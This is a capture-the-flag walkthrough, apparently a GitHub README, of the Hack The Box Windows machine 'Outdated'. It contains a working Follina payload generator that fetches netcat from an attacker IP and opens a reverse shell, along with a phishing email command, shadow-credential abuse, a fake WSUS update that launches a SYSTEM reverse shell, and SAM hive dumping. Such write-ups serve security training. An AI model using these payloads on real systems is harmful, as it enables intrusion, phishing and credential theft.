Skip to content

TheMursalin/Outdated

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 

Repository files navigation

Outdated

Outdated: A Walkthrough by Mursalin

Outdated is a medium-difficulty Windows box that strings together three captivating attack primitives: exploiting the Follina vulnerability via a malicious link sent to an email address harvested from an SMB share, lateral movement through shadow credentials, and ultimately abusing Windows Server Update Services (WSUS) to push a fake update and gain SYSTEM on the domain controller. In Beyond Root, I’ll revisit the intended path that involved HiveNightmare and PyWhisker, which I was able to bypass with a direct Whisker compilation.

Box Info

Field Value
Name Outdated
OS Windows
Difficulty Medium
Release 13 Aug 2022
Retire 10 Dec 2022
User blood 00:17:09 (original: guglia001)
Root blood 00:16:33 (original: guglia001)
Creator ctrlzero

Recon

nmap

A full TCP scan reveals a rich set of services typical for a Windows domain controller, along with extra ports that hint at WSUS:

mursalin@kali$ nmap -p- --min-rate 10000 10.10.11.122
...
25/tcp    open  smtp
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
587/tcp   open  submission
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
2179/tcp  open  vmrdp
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
8530/tcp  open  http
8531/tcp  open  unknown
9389/tcp  open  adws
...

Service version detection confirms the hostnames dc.outdated.htb, mail.outdated.htb and the domain outdated.htb. I add these to /etc/hosts:

10.10.11.122 dc.outdated.htb mail.outdated.htb outdated.htb

An SMB null session reveals an interesting share named Shares, which contains a single PDF:

mursalin@kali$ smbclient -N //10.10.11.122/shares
smb: \> ls
  NOC_Reminder.pdf   AR   106977  Mon Jun 20 15:00:32 2022
smb: \> get NOC_Reminder.pdf

The PDF Hint

The document is a “NOC Reminder” that asks employees to send links to web applications to itsupport@outdated.htb for testing. It also lists several CVEs, most notably CVE-2022-30190 (Follina). This immediately tells me that phishing the IT support user with a Follina payload is the intended initial access.

Shell as btables on CLIENT

CVE-2022-30190 (Follina) Background

Follina abuses the ms-msdt:/ protocol handler. When a user opens a malicious Office document or, crucially, simply visits an attacker‑controlled HTML page that redirects to a specially crafted ms-msdt: URL longer than 4096 bytes, the Microsoft Diagnostic Tool executes arbitrary PowerShell code without any prompt.

I’ll craft a minimal HTML payload that triggers the bug and fetches a reverse shell.

Generating the Payload

I use a short Python script that takes a command, base64‑encodes it, and wraps it in JavaScript that redirects to the ms-msdt: URL, padded to >4096 bytes with random letters:

#!/usr/bin/env python3
import base64, random, string, sys

command = sys.argv[1] if len(sys.argv) > 1 else "IWR http://10.10.14.6/nc64.exe -outfile C:\\programdata\\nc64.exe; C:\\programdata\\nc64.exe 10.10.14.6 443 -e cmd"
b64_payload = base64.b64encode(command.encode()).decode()

html = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{b64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html += ''.join(random.choice(string.ascii_lowercase) for _ in range(4096)) + "\n</script>"
print(html)

I save the output to msdt.html and serve it with Python’s HTTP server.

Sending the Phish

Using swaks, I send an email to itsupport@outdated.htb:

mursalin@kali$ swaks --to itsupport@outdated.htb --from "mursalin@mursalin.htb" \
  --header "Subject: Internal web app" --body "http://10.10.14.6/msdt.html"

Moments later, I receive two HTTP requests—one for the HTML page, one for nc64.exe—and then a reverse shell:

mursalin@kali$ rlwrap -cAr nc -lvnp 443
Connection received on 10.10.11.122 49804
Microsoft Windows [Version 10.0.19043.928]
...
C:\Users\btables\AppData\Local\Temp\SDIAG_...> powershell

I’m now outdated\btables on a machine named CLIENT. It’s actually a Hyper‑V container, as revealed by its IP (172.16.20.20), but it is domain‑joined.

Shell as sflowers on DC

BloodHound Enumeration

I upload SharpHound.exe and run it:

PS C:\programdata> iwr http://10.10.14.6/SharpHound.exe -outfile s.exe
PS C:\programdata> .\s.exe -C all

Exfiltrating the ZIP via an impromptu SMB share, I open BloodHound, mark btables as owned, and examine its outbound control rights. The user belongs to the ITSTAFF group, which has AddKeyCredentialLink (shadow credentials) over the user sflowers.

Shadow Credentials with Whisker

Because I’m already running as btables inside the container, I can simply execute the Windows tool Whisker without needing to know btables’ password. I compile Whisker from source (cloning the repo into Visual Studio) and upload the resulting Whisker.exe to the CLIENT.

First, I verify there are no existing shadow credentials for sflowers:

PS C:\programdata> .\w.exe list /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb
[*] No entries!

Now I add one with a password of my choosing:

PS C:\programdata> .\w.exe add /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb /password:MursalinPass123!
[+] Updated the msDS-KeyCredentialLink attribute of the target object

Whisker outputs a Rubeus command that will request a TGT using the newly added certificate. I download a pre‑compiled Rubeus.exe and run it:

PS C:\programdata> .\r.exe asktgt /user:sflowers /certificate:... /password:"MursalinPass123!" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
...
       NTLM              : 1FCDB1F6015DCB318CC77BB2BDA14DB5

I now have sflowers’ NTLM hash.

WinRM Access

BloodHound shows that sflowers is a member of Remote Management Users, so I can use Evil‑WinRM to reach the domain controller:

mursalin@kali$ evil-winrm -u sflowers -i dc.outdated.htb -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
*Evil-WinRM* PS C:\Users\sflowers\Documents> cat ../desktop/user.txt
c107c589************************

Privilege Escalation to SYSTEM on DC

WSUS Background

Windows Server Update Services (WSUS) allows centralised patch management. The WSUS Administrators group—of which sflowers is a member—can approve and deploy updates to domain‑joined machines. Since the domain controller itself is a WSUS client, we can weaponise this to execute arbitrary commands as SYSTEM.

I compile SharpWSUS from the same repository and upload it to the DC.

Inspecting the WSUS Configuration

SharpWSUS locates the server automatically, and also enumerates clients:

*Evil-WinRM* PS C:\programdata> .\sw.exe locate
WSUS Server: http://wsus.outdated.htb:8530

*Evil-WinRM* PS C:\programdata> .\sw.exe inspect
...
ComputerName, IPAddress, OSVersion
dc.outdated.htb, 172.16.20.1, 10.0.17763.652

Only the DC itself appears, which is exactly where I want SYSTEM.

Creating a Malicious Update

WSUS only allows signed Microsoft binaries to be deployed, but that’s not a problem—I’ll use Microsoft’s own PsExec.exe from Sysinternals. I upload PsExec64.exe and nc64.exe to C:\programdata\.

Now I create the update payload:

*Evil-WinRM* PS C:\programdata> .\sw.exe create /payload:"C:\programdata\ps.exe" /args:" -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445" /title:"Critical Patch"
...
[*] Update created – When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:dc.outdated.htb /groupname:"CriticalPatches"

I immediately approve it:

*Evil-WinRM* PS C:\programdata> .\sw.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:dc.outdated.htb /groupname:"CriticalPatches"
[+] Approved Update

After a short wait, my netcat listener catches a SYSTEM shell:

mursalin@kali$ rlwrap -cAr nc -lvnp 445
Connection received on 10.10.11.122 49944
Microsoft Windows [Version 10.0.17763.737]
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
d4ec65b6************************

Beyond Root – The Original Path (HiveNightmare + PyWhisker)

The box author intended for players to first retrieve btables’ password using the HiveNightmare vulnerability (CVE-2021-36934) and then run the Python version of Whisker (PyWhisker) from the attack host. I bypassed this step entirely by running Whisker.exe directly inside the container, but it’s still a useful alternative to demonstrate.

HiveNightmare – Dumping the SAM

On the CLIENT machine, the SAM registry hive is world‑readable:

C:\> icacls C:\windows\system32\config\SAM
...
BUILTIN\Users:(I)(RX)

I upload the compiled HiveNightmare.exe and run it. It automatically mounts shadow copies and extracts the SAM, SECURITY, and SYSTEM hives into the current directory. After copying them to my attacker box via an SMB share, I use secretsdump.py to extract local hashes and, critically, a plaintext domain credential:

mursalin@kali$ secretsdump.py -sam SAM-2022-08-02 -security SECURITY-2022-08-02 -system SYSTEM-2022-08-02 local
...
[*] DefaultPassword
(Unknown User):5myBPLPDKT3Bfq

Testing with CrackMapExec confirms it belongs to btables:

mursalin@kali$ crackmapexec smb 10.10.11.122 -u btables -p '5myBPLPDKT3Bfq'
[+] outdated.htb\btables:5myBPLPDKT3Bfq

PyWhisker (Remote Shadow Credentials)

With valid credentials, I can now use PyWhisker from my Kali machine. The domain enforces LDAPS, so I add --use-ldaps:

mursalin@kali$ python /opt/pywhisker/pywhisker.py --action add -d outdated.htb -u btables -p '5myBPLPDKT3Bfq' --dc-ip 10.10.11.122 -t sflowers --use-ldaps
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX certificate & key at path: alTWylpv.pfx
[*] Must be used with password: CpgwxPvDtXvsf4wNjjgN

Then, using PKINITtools, I request a TGT and recover the NT hash:

mursalin@kali$ python /opt/PKINITtools/gettgtpkinit.py -cert-pfx alTWylpv.pfx -pfx-pass CpgwxPvDtXvsf4wNjjgN outdated.htb/sflowers sflowers.ccache -dc-ip 10.10.11.122
mursalin@kali$ export KRB5CCNAME=sflowers.ccache
mursalin@kali$ python /opt/PKINITtools/getnthash.py outdated.htb/sflowers -key <AS-REP key>
Recovered NT Hash
1fcdb1f6015dcb318cc77bb2bda14db5

From there, the same WinRM and WSUS steps apply. Having both paths available shows how the ecosystem of tooling has evolved to make attacks like these portable and scriptable.


That wraps up Outdated – a brilliantly designed box that forces you to chain a realistic phishing scenario with modern Active Directory tradecraft. I thoroughly enjoyed every stage.

~ Mursalin

About

No description, website, or topics provided.

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors